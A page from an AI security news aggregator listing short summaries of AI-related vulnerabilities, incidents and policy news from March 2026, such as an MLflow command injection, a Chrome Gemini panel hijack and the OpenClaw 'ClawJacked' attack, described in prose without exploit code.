aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,678
[LAST_24H]
22
[LAST_7D]
165
Daily BriefingMonday, March 30, 2026
>

Anthropic's Unreleased Cybersecurity Model Accidentally Exposed: A configuration error leaked details of Anthropic's powerful new AI model called Mythos, designed for cybersecurity use cases with advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The leak raises concerns because the model's improved vulnerability detection could enable more sophisticated cyberattacks, prompting Anthropic to plan a phased rollout to enterprise security teams first.

>

Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where attackers insert malicious commands into input that gets executed) in its model serving code when using `env_manager=LOCAL`, allowing attackers to execute arbitrary commands by manipulating dependency information in the `python_env.yaml` file without any safety checks. (CVE-2025-15379, Critical)

Latest Intel

page 69/268
VIEW ALL
01

I checked out one of the biggest anti-AI protests ever

policyindustry
Critical This Week5 issues
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379NVD/CVE DatabaseMar 30, 2026
Mar 30, 2026
>

Multiple High-Severity Flaws in AI Agent Frameworks: CrewAI has several vulnerabilities including Docker fallback issues that enable RCE (remote code execution, where attackers run commands on systems they don't control) when containerization fails (CVE-2026-2287, CVE-2026-2275), while OpenClaw suffers from malicious plugin code execution during installation and sandbox bypass flaws that let agents access other agents' workspaces. SakaDev and HAI Build Code Generator can both be tricked through prompt injection (hiding malicious instructions in normal-looking input) to misclassify dangerous terminal commands as safe and execute them automatically (CVE-2026-30306, CVE-2026-30308).

>

ChatGPT Data Leakage Vulnerability Patched: OpenAI fixed a vulnerability that allowed attackers to secretly extract sensitive user data including conversation messages and uploaded files by exploiting a hidden DNS-based communication channel (covert data transmission using the Domain Name System) in ChatGPT's Linux runtime, bypassing all safety guardrails designed to prevent unauthorized data sharing.

Mar 2, 2026

Anti-AI protest groups organized a march in London on February 28 with a couple hundred protesters expressing concerns about generative AI (AI systems trained on large amounts of data to generate text, images, or other content), ranging from job displacement and harmful content to existential risks. The protest represents a significant growth in organized anti-AI activism, with groups like Pause AI expanding rapidly since their 2023 founding to mobilize larger crowds around concerns that researchers have documented about AI systems like ChatGPT and Gemini.

MIT Technology Review
02

Anthropic confirms Claude is down in a worldwide outage

security
Mar 2, 2026

Claude, an AI assistant made by Anthropic, experienced a widespread outage on March 2, 2026, affecting users across all platforms including web, mobile, and API (the interface developers use to connect to the service). Users reported failed requests, timeouts (when the system doesn't respond in time), and inconsistent responses, with the company still investigating the cause as of the last update.

BleepingComputer
03

LLM-Assisted Deanonymization

securityprivacy
Mar 2, 2026

Researchers demonstrated that LLMs (large language models, AI systems trained on vast amounts of text) can effectively de-anonymize people by identifying them from their anonymous online posts across platforms like Hacker News, Reddit, and LinkedIn. By analyzing just a handful of comments, these AI systems can infer personal details like location, occupation, and interests, then search the web to match and identify the anonymous user with high accuracy across tens of thousands of candidates.

Schneier on Security
04

Taming Agentic Browsers: Vulnerability in Chrome Allowed Extensions to Hijack New Gemini Panel

security
Mar 2, 2026

A high-severity vulnerability (CVE-2026-0628) in Google Chrome's Gemini AI feature allowed malicious extensions with basic permissions to hijack the Gemini panel and gain unauthorized access to sensitive resources like the camera, microphone, screenshots, and local files. Google released a fix in early January 2026, and the vulnerability highlights how integrating AI directly into browsers creates new security risks when AI components have overly broad access to the browser environment.

Fix: Google released a fix in early January 2026. Additionally, Palo Alto Networks' Prisma Browser is mentioned as a product designed to prevent extension-based attacks like this vulnerability.

Palo Alto Unit 42
05

I’m on the Meta Oversight Board. We need AI protections now | Suzanne Nossel

policysafety
Mar 2, 2026

AI is developing faster than government regulation can keep up, creating risks like chatbots giving harmful advice to teens and potential misuse for creating biological weapons. Unlike industries such as nuclear power or pharmaceuticals, AI companies are not required to disclose safety problems or undergo independent testing before releasing new models to the public. The author argues that independent oversight of AI platforms is necessary to protect people's rights and safety.

The Guardian Technology
06

Innovation without exposure: A CISO’s secure-by-design framework for business outcomes

policysecurity
Mar 2, 2026

Security leaders (CISOs, who oversee an organization's security strategy) face pressure to enable innovation like AI adoption while reducing risk and staying within budget constraints. The source argues that well-governed innovation actually reduces risk by preventing uncontrolled tool sprawl and shadow IT (unauthorized software systems), but unmanaged innovation creates fragile systems that increase damage from security incidents. The key is bringing discipline to experimentation by automating routine tasks, giving teams ownership of meaningful improvements with clear end goals, and using AI strategically only where it changes the risk equation without creating new vulnerabilities.

CSO Online
07

Bug in Google's Gemini AI Panel Opens Door to Hijacking

security
Mar 2, 2026

A bug in Google's Gemini AI Panel allowed attackers to escalate privileges (gain higher-level access to a system), violate user privacy during browsing, and access sensitive resources. The vulnerability created a security risk by opening a door for unauthorized control of the system.

Dark Reading
08

Deepfake attack: 'Many people could have been cheated'

safetysecurity
Mar 2, 2026

Deepfakes (AI-generated fake videos that look real) are being used to trick people into financial fraud, with incidents ranging from fake stock advice videos in India to a $25 million theft at an engineering firm where employees were deceived by deepfake video calls. The technology is becoming easier and cheaper to create, making these attacks a growing threat to both individuals and companies.

BBC Technology
09

ClawJacked attack let malicious websites hijack OpenClaw to steal data

security
Mar 1, 2026

A vulnerability called ClawJacked in OpenClaw (a self-hosted AI platform that runs AI agents locally) allowed malicious websites to secretly take control of a running instance and steal data by brute-forcing the password through the browser. The attack exploited the fact that OpenClaw's gateway service listens on localhost (127.0.0.1, a local-only address) with a WebSocket interface (a two-way communication protocol), and localhost connections were exempt from rate limiting, allowing attackers to guess passwords hundreds of times per second without triggering protections.

Fix: Update to OpenClaw version 2026.2.26 or later immediately. According to the source, the fix "tightens WebSocket security checks and adds additional protections to prevent attackers from abusing localhost loopback connections to brute-force logins or hijack sessions, even if those connections are configured to be exempt from rate limiting."

BleepingComputer
10

OpenAI reveals more details about its agreement with the Pentagon

policysecurity
Mar 1, 2026

OpenAI reached an agreement with the Department of Defense to deploy its AI models in classified environments, after Anthropic's similar negotiations failed. OpenAI stated it has safeguards preventing use in mass domestic surveillance, autonomous weapons, or high-stakes automated decisions, implemented through a multi-layered approach including cloud deployment, human oversight, and contractual protections. However, critics argue the contract language may still allow domestic surveillance under existing executive orders, while OpenAI's leadership contends that deployment architecture (how the system is technically set up) matters more than contract terms for preventing misuse.

TechCrunch
Prev1...6768697071...268Next
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026
critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputerMar 26, 2026
Mar 26, 2026